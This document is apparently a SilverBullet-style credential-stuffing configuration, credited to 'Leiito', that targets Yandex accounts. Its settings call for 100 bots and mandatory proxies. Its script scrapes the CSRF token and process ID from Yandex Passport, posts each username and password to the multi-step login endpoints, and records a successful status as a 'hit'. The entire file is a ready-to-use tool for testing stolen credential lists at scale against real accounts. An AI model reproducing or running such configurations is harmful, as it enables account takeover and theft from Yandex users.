[SETTINGS]
{
  "Name": "Yandex.ru -Leiito-",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-16T12:27:08.3308771-08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Leiito",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Yandex",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<USER>" Contains "@yandex.ru" 
  KEYCHAIN Failure OR 
    KEY "<USER>" DoesNotContain "@yandex.ru" 

REQUEST GET "https://passport.yandex.ru/auth?origin=home_yandexid&retpath=https%3A%2F%2Fyandex.ru&backpath=https%3A%2F%2Fyandex.ru" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"csrf_token\" value=\"" "\"/>" -> VAR "TK" 

PARSE "<SOURCE>" LR "process_uuid=" "\"" -> VAR "TK2" 

FUNCTION URLEncode "<USER>" -> VAR "US" 

REQUEST POST "https://passport.yandex.ru/registration-validations/auth/multi_step/start" 
  CONTENT "csrf_token=<TK>&login=<US>&process_uuid=<TK2>&retpath=https%3A%2F%2Fyandex.ru&origin=home_yandexid" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: passport.yandex.ru" 
  HEADER "Origin: https://passport.yandex.ru" 
  HEADER "Referer: https://passport.yandex.ru/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "can_register\":true" 
  KEYCHAIN Success OR 
    KEY "referred_auth_method\":\"password\"" 

PARSE "<SOURCE>" JSON "track_id" -> VAR "TK3" 

FUNCTION URLEncode "<PASS>" -> VAR "PS" 

REQUEST POST "https://passport.yandex.ru/registration-validations/auth/multi_step/commit_password" 
  CONTENT "track_id=<TK3>&csrf_token=<TK>&password=<PS>&retpath=https%3A%2F%2Fyandex.ru" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: passport.yandex.ru" 
  HEADER "Origin: https://passport.yandex.ru" 
  HEADER "Referer: https://passport.yandex.ru/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "password.not_matched" 
  KEYCHAIN Success OR 
    KEY "\"status\":\"ok\"" 

#Author FUNCTION Constant "Author Leiito" -> CAP "Author Leiito" 

